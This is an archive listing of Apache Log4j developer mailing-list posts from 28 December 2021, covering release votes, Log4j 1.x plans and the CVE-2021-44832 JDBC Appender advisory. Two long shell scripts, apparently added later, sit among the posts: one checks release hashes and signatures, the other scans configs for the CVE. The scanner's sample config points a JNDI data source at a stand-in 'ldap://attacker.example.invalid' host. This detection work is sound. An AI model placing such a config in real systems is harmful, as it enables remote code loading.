Re: [VOTE] Release Apache Log4j Scala API version 13.0-rc1

2021-12-28 Thread Volkan Yazıcı
Shall we cancel this, upgrade to 2.17.1, and revote? On Thu, Dec 23, 2021 at 10:45 PM Matt Sicker wrote: > This is a vote to release Log4j Scala API 13.0. This release primarily > adds support for Scala 3. > > Please download, test, and cast your votes on the log4j developers list. > [] +1, rele

Re: [VOTE] Release Log4j Kotlin API 1.2.0-rc3

2021-12-28 Thread Volkan Yazıcı
Shall we cancel this, upgrade to 2.17.1, and revote? On Tue, Dec 21, 2021 at 5:02 AM Matt Sicker wrote: > This is a vote to release Log4j Kotlin API version 1.2.0, the next version > of the Kotlin facade for Log4j2. > > Please download, test, and cast your votes on the log4j developers list. > [

Re: [VOTE] Release Log4j 2.3.2 for Java 6

2021-12-28 Thread Volkan Yazıcı
+1 commits OK sigs OK hashes OK `./mvnw clean verify apache-rat:check *-pl \!:log4j-perf*` OK on $ java -version openjdk version "1.8.0_312" OpenJDK Runtime Environment (Zulu 8.58.0.13-CA-linux64) (build 1.8.0_312-b07) OpenJDK 64-Bit Server VM (Zulu 8.58.0.13-CA-linux64) (build 25.312-b07, mixed

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

2021-12-28 Thread Volkan Yazıcı
+1 commits OK sigs OK hashes OK `./mvnw clean verify apache-rat:check` OK on $ java -version openjdk version "1.8.0_312" OpenJDK Runtime Environment (Zulu 8.58.0.13-CA-linux64) (build 1.8.0_312-b07) OpenJDK 64-Bit Server VM (Zulu 8.58.0.13-CA-linux64) (build 25.312-b07, mixed mode) $ uname -a Li

Re: [VOTE] Release Log4j 2.3.2 for Java 6

2021-12-28 Thread Remko Popma
+1 Hashes and signatures OK, build OK: Apache Maven 3.6.2 (40f52333136460af0dc0d7232c0dc0bcf0d9e117; 2019-08-28T00:06:16+09:00) Maven home: C:\apps\apache-maven-3.6.2\bin\.. Java version: 1.8.0_202, vendor: Oracle Corporation, runtime: C:\apps\jdk1.8.0_202\jre Default locale: en_GB, platform enco

Re: [DISCUSS] The future of Log4j 1.x

2021-12-28 Thread Volkan Yazıcı
Agreed with all points of Carter. It is either 1 or 4. Anything more than 4 (including 5) is a hard no from me. On Fri, Dec 24, 2021 at 6:00 PM Carter Kozak wrote: > I would agree directionally with option 1 or option 4. > > Making changes without pushing binary artifacts to maven central (opti

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

2021-12-28 Thread Remko Popma
+1 signatures and hashes OK build tag log4j-2.12.4-rc1 OK Apache Maven 3.6.2 (40f52333136460af0dc0d7232c0dc0bcf0d9e117; 2019-08-28T00:06:16+09:00) Maven home: C:\apps\apache-maven-3.6.2\bin\.. Java version: 1.8.0_202, vendor: Oracle Corporation, runtime: C:\apps\jdk1.8.0_202\jre Default locale:

Re: [VOTE] Release log4net 2.0.14

2021-12-28 Thread Davyd McColl
Thanks Matt, then I'd consider this vote closed and the release ready to go as soon as I get to it (probably the end of the week). Thanks to everyone who double-checked me. -d On December 29, 2021 02:23:16 Matt Sicker wrote: Yeah, you can close the vote before releasing. -- Matt Sicker O

Re: [VOTE] Release Log4j 2.3.2 for Java 6

2021-12-28 Thread Ralph Goers
+1 Verified Signatures, hashes and ran the build on my Mac. Ralph > On Dec 28, 2021, at 6:59 PM, Matt Sicker wrote: > > This is a vote to release Log4j 2.3.2, a security release for Java 6 users. > > Please download, test, and cast your votes on the log4j developers list. > [] +1, release th

Re: [VOTE] Release Apache Log4j Scala API version 13.0-rc1

2021-12-28 Thread Matt Sicker
Good catch! Added sig files for those two. -- Matt Sicker > On Dec 28, 2021, at 21:22, Gary Gregory wrote: > > Hi Matt, > > dist.a.o is missing ASC files for: > - apache-log4j-api-scala-13.0-bin.zip > - apache-log4j-api-scala-13.0-bin.tar.gz > > Gary > > > On Thu, Dec 23, 2021 at 4:45 PM Mat

Re: [VOTE] Release Apache Log4j Scala API version 13.0-rc1

2021-12-28 Thread Gary Gregory
Hi Matt, dist.a.o is missing ASC files for: - apache-log4j-api-scala-13.0-bin.zip - apache-log4j-api-scala-13.0-bin.tar.gz Gary On Thu, Dec 23, 2021 at 4:45 PM Matt Sicker wrote: > This is a vote to release Log4j Scala API 13.0. This release primarily > adds support for Scala 3. > > Please do

Re: [VOTE] Release Log4j 2.3.2 for Java 6

2021-12-28 Thread Gary Gregory
+1 ASC files from dist.a.o OK sha512 files from dist.a.o OK RAT check OK 'mvn clean install' OK 'mvn site -DskipTests' fails with ERROR [org.apache.fop.fo.FONode:85] 2021-12-28 21:56:54,956 - I/O error while loading image: null ERROR [org.apache.fop.fo.FONode:85] 2021-12-28 21:56:55,015 - I/O erro

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

2021-12-28 Thread Gary Gregory
Note that the part about skipping the Cassandra module is to work out an odd failure that seems to happen only on my Mac Mini and maybe also on M1 macs (not sure about that last one) Gary On Tue, Dec 28, 2021 at 9:43 PM Ron Grabowski wrote: > +1 > > "mvn clean install -pl '!log4j-cassandra'" ra

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

2021-12-28 Thread Ron Grabowski
+1 "mvn clean install -pl '!log4j-cassandra'" ran correctly. Verified hashes and asc files. RAT passed too. On 12/28/2021 7:46 PM, Gary Gregory wrote: +1 SHA512 OK ASC OK RAT check OK mvn clean install -pl '!log4j-cassandra' OK openjdk version "1.8.0_312" OpenJDK Runtime Environment (build

Re: [VOTE] Release Log4j Kotlin API 1.2.0-rc3

2021-12-28 Thread Matt Sicker
Gentle reminder. -- Matt Sicker > On Dec 21, 2021, at 15:21, Gary Gregory wrote: > > Is it possible that RAT is only configured for reporting and not invocation > from a build? The log4j RAT passes. > > Gary > > > > On Tue, Dec 21, 2021, 16:12 Matt Sicker > wrote: >

Re: [VOTE] Release Apache Log4j Scala API version 13.0-rc1

2021-12-28 Thread Matt Sicker
Gentle reminder. -- Matt Sicker > On Dec 23, 2021, at 15:44, Matt Sicker wrote: > > This is a vote to release Log4j Scala API 13.0. This release primarily adds > support for Scala 3. > > Please download, test, and cast your votes on the log4j developers list. > [] +1, release the artifacts > [

[VOTE] Release Log4j 2.3.2 for Java 6

2021-12-28 Thread Matt Sicker
This is a vote to release Log4j 2.3.2, a security release for Java 6 users. Please download, test, and cast your votes on the log4j developers list. [] +1, release the artifacts [] -1, don't release because… The vote will remain open for as short an amount of time as required to vet the release. Al

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

2021-12-28 Thread Gary Gregory
+1 SHA512 OK ASC OK RAT check OK mvn clean install -pl '!log4j-cassandra' OK openjdk version "1.8.0_312" OpenJDK Runtime Environment (build 1.8.0_312-bre_2021_10_20_23_15-b00) OpenJDK 64-Bit Server VM (build 25.312-b00, mixed mode) Apache Maven 3.8.4 (9b656c72d54e5bacbed989b64718c159fe39b537) Ma

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

2021-12-28 Thread Gary Gregory
The good thing is that the ASC files are in the proper format to verify with 'gpg --verify' :-) The bad thing is that 'shasum --check' does not understand our sha512 or sha256 files :-( Gary On Tue, Dec 28, 2021 at 7:22 PM Gary Gregory wrote: > I think it is more interesting to download the dis

Re: [VOTE] Release log4net 2.0.14

2021-12-28 Thread Matt Sicker
Yeah, you can close the vote before releasing. -- Matt Sicker > On Dec 28, 2021, at 16:11, Davyd McColl wrote: > > Hi Matt, I'm happy to, just need to get the time to do the actually release > (: holiday mode has kicked in good and proper. Can I close out before I > release? > > -d > > > On

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

2021-12-28 Thread Gary Gregory
I think it is more interesting to download the dist archive instead of the Maven repo because each PMC member is supposed to validate sigs, so: wget -e robots=off --cut-dirs=7 -nH -r -p -np --no-check-certificate https://dist.apache.org/repos/dist/dev/logging/log4j/ ATM you get more than you need
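The two messages above (the wget pull of dist.a.o and the remark that `gpg --verify` accepts the .asc files while `shasum --check` rejects the .sha512 files) describe the check each PMC member is expected to run. Below is an added example of that check as a POSIX shell script; it is not Log4j project tooling. It assumes the .sha512 files are in the layout `gpg --print-md SHA512` emits (`<file>: ABCD 1234 ...`, upper-case groups wrapped over several lines), which is an inference from the `shasum --check` remark, and it also accepts the coreutils `<hex>  <file>` layout. Artifact names and the constructed self-check fixture are illustrative only.

```shell
#!/bin/sh
# Added example for this thread (not Log4j project tooling): check a directory
# pulled from dist.apache.org the way a PMC member is expected to, i.e. every
# artifact has a .sha512 whose digest matches and a detached .asc signature
# that gpg accepts. The .sha512 parser accepts both the coreutils layout
# ("<hex>  <file>", what `shasum --check` expects) and the layout produced by
# `gpg --print-md SHA512` ("<file>: ABCD 1234 ..." in upper-case groups,
# wrapped over several lines). That the project's files use the latter is an
# assumption drawn from the "shasum --check does not understand them" remark.

# Hex SHA-512 of a file, lower-case, using whichever tool is installed.
compute_sha512() {
    if command -v sha512sum >/dev/null 2>&1; then
        sha512sum "$1" | awk '{ print $1 }'
    else
        shasum -a 512 "$1" | awk '{ print $1 }'
    fi
}

# Lower-case hex digest recorded in a .sha512 file, whichever layout it uses.
digest_from_file() {
    if grep -q ':' "$1"; then
        # gpg --print-md layout: drop "<file>:", then every space and newline
        tr -d '\n' < "$1" | sed 's/^[^:]*://' | tr -d ' \t' | tr 'A-F' 'a-f'
    else
        # coreutils layout: first field of the first line
        awk 'NR == 1 { print tolower($1) }' "$1"
    fi
}

# 0 if "$1" matches the digest in "$1.sha512", 1 otherwise.
verify_hash() {
    expected=$(digest_from_file "$1.sha512")
    actual=$(compute_sha512 "$1")
    [ -n "$expected" ] && [ "$expected" = "$actual" ]
}

# 0 if "$1.asc" is a good signature over "$1" by a key already in the keyring.
# Import the project's KEYS file first: gpg only proves "signed by a key you
# chose to import", so a valid signature from an unknown key is still a FAIL.
verify_sig() {
    gpg --batch --verify "$1.asc" "$1" >/dev/null 2>&1
}

# Walk a dist directory: report every artifact, return 1 if any hash or
# signature failed or an .asc is missing (the gap spotted in the Scala API vote).
verify_dist_dir() {
    rc=0
    for sum in "$1"/*.sha512; do
        [ -e "$sum" ] || continue
        f=${sum%.sha512}
        if verify_hash "$f"; then echo "OK      sha512  $f"; else echo "FAIL    sha512  $f"; rc=1; fi
        if [ ! -e "$f.asc" ]; then
            echo "MISSING asc     $f"; rc=1
        elif verify_sig "$f"; then
            echo "OK      asc     $f"
        else
            echo "FAIL    asc     $f"; rc=1
        fi
    done
    return $rc
}

# Constructed fixture helper: write "$1"'s digest to "$2" in gpg --print-md
# layout (upper-case groups of four, eight groups per line, continuation
# lines indented) so the parser can be exercised without a real release.
write_gpg_style_sha512() {
    {
        printf '%s:' "$(basename "$1")"
        compute_sha512 "$1" | tr 'a-f' 'A-F' | sed 's/..../ &/g' | fold -w 40 | sed '2,$s/^/      /'
    } > "$2"
}

# Stand-alone self-check on a constructed artifact (no network, no keys needed).
self_check() {
    tmp=$(mktemp -d) || return 1
    printf 'constructed artifact, not a real release\n' > "$tmp/x.zip"
    write_gpg_style_sha512 "$tmp/x.zip" "$tmp/x.zip.sha512"
    if verify_hash "$tmp/x.zip"; then ok=0; else ok=1; fi
    rm -rf "$tmp"
    return $ok
}

self_check && echo "self-check: gpg --print-md layout parsed and verified"
```

Run `verify_dist_dir <dir>` on the directory the wget above produces; anything other than a column of OK lines (a FAIL, or a MISSING asc) is a reason to vote -1 rather than +1. The hash check only detects corruption or a mismatched upload; the signature check is the one that ties the artifact to a release manager's key, and it is only as strong as the KEYS file you imported.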

Re: Issue with white spaces and log4j2 configuration loaded from resource jar

2021-12-28 Thread Gary Gregory
A legal URI cannot contain a space (per the RFC), you'll have to escape it to %20. Gary On Tue, Dec 28, 2021 at 3:29 PM Leon Finker wrote: > Hi, > > In one of our applications we're hitting the following issue in the > latest log4j2 versions. We specify a config file, and it's found and > loade

[VOTE] Release Log4j 2.12.4-rc1 for Java 7

2021-12-28 Thread Ralph Goers
This is a vote to release Log4j 2.12.4, a security release for Java 7 users. Please download, test, and cast your votes on the log4j developers list. [] +1, release the artifacts [] -1, don't release because… The vote will remain open for as short an amount of time as required to vet the release. A

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

2021-12-28 Thread Ralph Goers
Xeno, We take security issues very seriously. It is ASF policy that no one should publicly discuss security issues before a patch is available. In this case that policy was not followed by someone outside of the ASF who should know better. Most people will read this CVE and conclude it is not

Re: [log4cxx] CI Benchmarking

2021-12-28 Thread Stephen Webb
It occurs to me that a better approach might be to run two benchmark versions in the same job and compare the results. A 'good' reference version artifact could be downloaded and compared with the new version.

Re: [VOTE] Release log4net 2.0.14

2021-12-28 Thread Davyd McColl
Hi Matt, I'm happy to, just need to get the time to do the actual release (: holiday mode has kicked in good and proper. Can I close out before I release? -d On December 28, 2021 21:37:21 Matt Sicker wrote: Seems like we have enough votes to complete this release. Davyd, would you like t

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

2021-12-28 Thread Xeno Amess
sigh.. so 2.17.1 IS a security fix now? XenoAmess From: Matt Sicker Sent: Wednesday, December 29, 2021 4:07:48 AM To: dev@logging.apache.org Subject: Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration Ther

Re: Issue with white spaces and log4j2 configuration loaded from resource jar

2021-12-28 Thread Leon Finker
Hi Ralph, Upon further investigation the application is setting a URLClassLoader. Not using standard class loader that is normally used. I have to try and reproduce it. This happens only in this setup. Maybe the best thing is to just not rely on finding log4j config from jar any more and use absol

Re: Issue with white spaces and log4j2 configuration loaded from resource jar

2021-12-28 Thread Ralph Goers
Yes. It would be best if you could provide a sample that fails. I am assuming from your message that this happens on windows. Ralph > On Dec 28, 2021, at 1:29 PM, Leon Finker wrote: > > Hi, > > In one of our applications we're hitting the following issue in the > latest log4j2 versions. We sp

Issue with white spaces and log4j2 configuration loaded from resource jar

2021-12-28 Thread Leon Finker
Hi, In one of our applications we're hitting the following issue in the latest log4j2 versions. We specify a config file, and it's found and loaded from the class loader by log4j2. Unfortunately, it seems like there was a breaking change some time ago. It can no longer handle white spaces in the U

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

2021-12-28 Thread Matt Sicker
There’s no specific commit yet, just branches. The commits are coming over the next few hours as we cut the release candidates. -- Matt Sicker > On Dec 28, 2021, at 14:06, Jason Pyeron wrote: > >> -Original Message- >> From: Gary Gregory >> Sent: Tuesday, December 28, 2021 3:02 PM >> >

RE: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

2021-12-28 Thread Jason Pyeron
> -Original Message- > From: Gary Gregory > Sent: Tuesday, December 28, 2021 3:02 PM > > > 2.12.4 and 2.3.2 are brewing. I see, are they in git? If so, what commit? -Jason

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

2021-12-28 Thread Matt Sicker
Those releases are still being created right now. We’ll have release candidates and subsequent releases for 2.12.x and 2.3.x over the next day or two. -- Matt Sicker > On Dec 28, 2021, at 14:03, Jason Pyeron wrote: > >> >> The tag is rel/2.17.1 as usual. Download page is linked in the linked

RE: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

2021-12-28 Thread Jason Pyeron
> > The tag is rel/2.17.1 as usual. Download page is linked in the linked > announcement email > of the release. > >> Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix > >> releases 2.3.2 > and > >> 2.12.4) are vulnerable to a remote code execution (RCE) attack where an

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

2021-12-28 Thread Gary Gregory
On Tue, Dec 28, 2021 at 2:59 PM Jason Pyeron wrote: > > -Original Message- > > From: Matt Sicker [mailto:mattsic...@apache.org] > > Sent: Tuesday, December 28, 2021 2:27 PM > > To: annou...@apache.org; dev@logging.apache.org > > Subject: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

2021-12-28 Thread Matt Sicker
The tag is rel/2.17.1 as usual. Download page is linked in the linked announcement email of the release. -- Matt Sicker > On Dec 28, 2021, at 13:58, Jason Pyeron wrote: > >> -Original Message- >> From: Matt Sicker [mailto:mattsic...@apache.org] >> Sent: Tuesday, December 28, 2021 2:27 P

RE: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

2021-12-28 Thread Jason Pyeron
> -Original Message- > From: Matt Sicker [mailto:mattsic...@apache.org] > Sent: Tuesday, December 28, 2021 2:27 PM > To: annou...@apache.org; dev@logging.apache.org > Subject: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender > when attacker > controls configuration > > S

Re: [log4cxx] CI Benchmarking

2021-12-28 Thread Matt Sicker
I think the action approach is sufficient for now. If we can get a dedicated GHA runner or similar, we can eventually move the benchmarks to a dedicated machine and still use the same API. -- Matt Sicker > On Dec 28, 2021, at 13:39, Robert Middleton wrote: > > I think adding it to github actio

Re: [log4cxx] CI Benchmarking

2021-12-28 Thread Robert Middleton
I think adding it to GitHub Actions (while certainly not ideal) is at least a step in the right direction. If/when we have dedicated hardware to test it properly, we can then migrate it over. At least having it set up to start with should make migration easier, plus even if it's not super consisten

Re: [DISCUSS] The future of Log4j 1.x

2021-12-28 Thread Ralph Goers
Before any Pull Requests are reviewed this discussion needs to come to a conclusion. So far I have seen some people in favor of option 1, none in favor of option 2, none in favor of option 3, some in favor of option 1 or option 4, no one in favor of option 5 (with several -1s) and Vladimir wh

Re: [VOTE] Release log4net 2.0.14

2021-12-28 Thread Matt Sicker
Seems like we have enough votes to complete this release. Davyd, would you like to close the vote? -- Matt Sicker > On Dec 25, 2021, at 14:50, Remko Popma wrote: > > +1 > > On Sat, Dec 25, 2021 at 6:35 AM Ralph Goers > wrote: > >> +1 >> >> I checked the signature and hashes and those look g

CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

2021-12-28 Thread Matt Sicker
Severity: moderate Description: Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configu
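The advisory's condition is an attacker who can modify the logging configuration and adds a JDBC Appender whose data source is looked up through JNDI; the patched releases (2.17.1, 2.12.4, 2.3.2) only accept JNDI data source names in the `java:` namespace. Below is an added triage script, not part of the advisory or of Log4j, that sweeps Log4j 2 XML configurations for that shape. It assumes XML configuration files with the `jndiName` attribute on the same line as the `<DataSource` tag (JSON, YAML and properties configs need their own parser); the sample configs, file names and the `ldap://attacker.example.invalid/a` value are constructed for the stand-alone run.

```shell
#!/bin/sh
# Added example (not part of the advisory or the Log4j code base): sweep Log4j 2
# XML configurations for the CVE-2021-44832 shape, a <JDBC> appender whose
# <DataSource jndiName="..."> points outside the java: namespace. 2.17.1,
# 2.12.4 and 2.3.2 reject such names, so on a patched build a hit is a config
# that will stop working; on anything older it is the config-controlled RCE
# path. Assumptions: XML config only, and the jndiName attribute sits on the
# same line as the <DataSource tag.

# Print "file:line:jndiName" for every flagged DataSource; exit 0 when the file
# is clean, 1 when at least one was flagged. Tag and attribute names are
# matched case-insensitively, as Log4j's plugin lookup is.
scan_log4j2_config() {
    awk -v file="$1" '
        { lower = tolower($0) }
        lower ~ /<jdbc[[:space:]>]/ { in_jdbc = 1 }
        lower ~ /<\/jdbc>/          { in_jdbc = 0 }
        in_jdbc && lower ~ /<datasource/ {
            if (match(lower, /jndiname[[:space:]]*=[[:space:]]*"[^"]*"/)) {
                # take the value from the original line so its case is kept
                value = substr($0, RSTART, RLENGTH)
                sub(/^[^"]*"/, "", value)
                sub(/"$/, "", value)
                if (tolower(value) !~ /^java:/) {
                    printf "%s:%d:%s\n", file, NR, value
                    hits++
                }
            }
        }
        END { exit (hits > 0) }
    ' "$1"
}

# Scan every *.xml below a directory (paths without whitespace); 0 only if
# no file was flagged.
scan_tree() {
    rc=0
    for f in $(find "$1" -name '*.xml' -type f); do
        scan_log4j2_config "$f" || rc=1
    done
    return $rc
}

# Constructed sample configs for a stand-alone run; neither is a real
# deployment. good.xml uses the java: namespace, bad.xml the same appender
# with a non-java: JNDI name.
write_sample_configs() {
    cat > "$1/good.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="warn">
  <Appenders>
    <JDBC name="db" tableName="application_log">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="eventDate" isEventTimestamp="true"/>
      <Column name="message" pattern="%message"/>
    </JDBC>
  </Appenders>
  <Loggers><Root level="warn"><AppenderRef ref="db"/></Root></Loggers>
</Configuration>
EOF
    sed 's#java:comp/env/jdbc/LoggingDataSource#ldap://attacker.example.invalid/a#' \
        "$1/good.xml" > "$1/bad.xml"
}

# Stand-alone demonstration on the constructed configs.
demo_dir=$(mktemp -d)
write_sample_configs "$demo_dir"
if scan_tree "$demo_dir"; then echo "clean"; else echo "flagged (expected: bad.xml)"; fi
rm -rf "$demo_dir"
```

A hit from `scan_tree` is a triage lead, not a verdict: the vulnerable precondition is write access to the configuration file, so the durable fixes are upgrading to a patched release and keeping that file writable only by whoever deploys the application. After the upgrade, a flagged `jndiName` that was legitimate will need to move into the `java:` namespace or switch to a `ConnectionFactory`, since the patched versions refuse it.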

Re: Log4J 1.x progress, pull request(s), plans

2021-12-28 Thread Gary Gregory
The main point is, I thought, we agreed to not say/do anything until we have a PLAN. See also Ralph's request to call for a VOTE or wrap up the email with the list of options. Gary On Tue, Dec 28, 2021 at 2:08 PM Matt Sicker wrote: > I looked through most of the PR (besides the pom changes). Se

[ANNOUNCE] Apache Log4j 2.17.1 released

2021-12-28 Thread Matt Sicker
The Apache Log4j 2 team is pleased to announce the Log4j 2.17.1 release! Apache Log4j is a well known framework for logging application behavior. Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many other modern features such as s

Re: Log4J 1.x progress, pull request(s), plans

2021-12-28 Thread Matt Sicker
I looked through most of the PR (besides the pom changes). Seems good so far, but I’d like someone else to also verify. -- Matt Sicker > On Dec 28, 2021, at 12:36, Vladimir Sitnikov > wrote: > > Leo, All, > > I've reviewed Leo's changes and filed a PR > https://github.com/apache/logging-log4j

Re: Log4J 1.x progress, pull request(s), plans

2021-12-28 Thread Vladimir Sitnikov
Leo, All, I've reviewed Leo's changes and filed a PR https://github.com/apache/logging-log4j1/pull/18 CI: https://github.com/vlsi/log4j/runs/4652588702 I think it is worth separating "build script refactoring" from "bugfix" changes. Does anybody have cycles to review and merge "build script refa

[VOTE][RESULT] Release Apache Log4j 2.17.1-rc1

2021-12-28 Thread Matt Sicker
With my +1, the vote passes with 7 +1 votes from myself, Carter, Ron, Gary, Ralph, Remko, and Volkan. I’ll continue with the release. -- Matt Sicker > On Dec 28, 2021, at 06:23, Volkan Yazıcı wrote: > > +1 > > `./mvnw clean verify` passes on > > $ uname -a > Linux tahta 5.11.0-43-generic #47~

[GitHub] [logging-log4j1] vlsi opened a new pull request #18: Refine build scripts

2021-12-28 Thread GitBox
vlsi opened a new pull request #18: URL: https://github.com/apache/logging-log4j1/pull/18 This PR configures build and test scripts, so the project is buildable and testable with the current Maven and Java versions. Note: this change does not alter the features, so I suggest merging

Re: [log4cxx] CI Benchmarking

2021-12-28 Thread Volkan Yazıcı
Agreed with your remarks regarding the unreliability of benchmark results in the cloud. See my proposal in private@ to get some machines for continuous benchmarks. On Tue, Dec 28, 2021 at 10:17 AM Dominik Psenner wrote: > Hi Stephen, > > The trouble with benchmarks in CI is that the numbers may

Re: [VOTE] Release Apache Log4j 2.17.1-rc1

2021-12-28 Thread Volkan Yazıcı
+1 `./mvnw clean verify` passes on $ uname -a Linux tahta 5.11.0-43-generic #47~20.04.2-Ubuntu SMP Mon Dec 13 11:06:56 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux $ java -version openjdk version "1.8.0_312" OpenJDK Runtime Environment (Zulu 8.58.0.13-CA-linux64) (build 1.8.0_312-b07) OpenJDK 64-Bit

Re: [VOTE] Release Apache Log4j 2.17.1-rc1

2021-12-28 Thread Remko Popma
+1 signatures and hashes ok build ok Apache Maven 3.6.2 (40f52333136460af0dc0d7232c0dc0bcf0d9e117; 2019-08-28T00:06:16+09:00) Maven home: C:\apps\apache-maven-3.6.2\bin\.. Java version: 1.8.0_202, vendor: Oracle Corporation, runtime: C:\apps\jdk1.8.0_202\jre Default locale: en_GB, platform encodin

Re: [Chainsaw] Removal of Log4j1

2021-12-28 Thread Volkan Yazıcı
+1 for implementation-agnostic custom DTO tailored for Chainsaw. On Mon, Dec 27, 2021 at 9:31 PM Matt Sicker wrote: > I agree on the generic approach. While there’s a LogEvent interface in > log4j2, it would probably make sense for Chainsaw to define its own DTOs > and such. > -- > Matt Sicker >

Re: [log4cxx] CI Benchmarking

2021-12-28 Thread Xeno Amess
Yes... Benchmarks are only meaningful on the same machine and in exactly the same situation. Benchmarking in the cloud seems weird and pointless... Besides, they are time-consuming, and thus will make our CI worse. Dominik Psenner wrote on Tue, Dec 28, 2021 at 17:17: > Hi Stephen, > > The trouble with benchmarks in CI is t

Re: [log4cxx] CI Benchmarking

2021-12-28 Thread Dominik Psenner
Hi Stephen, The trouble with benchmarks in CI is that the numbers may be largely unreliable, depending mostly on the hardware where it runs and in general the surrounding environment. Chances are high that the benchmarks will not produce comparable results. It would however be good to provide som

Master branch

2021-12-28 Thread Ralph Goers
I have “fixed” the master branch build. Most of the components that were generating test jars have been split into two modules - the main component, which only builds the jar, and a -test component that builds a -test jar and then runs the unit tests. But there are still quirks: 1. log4j-core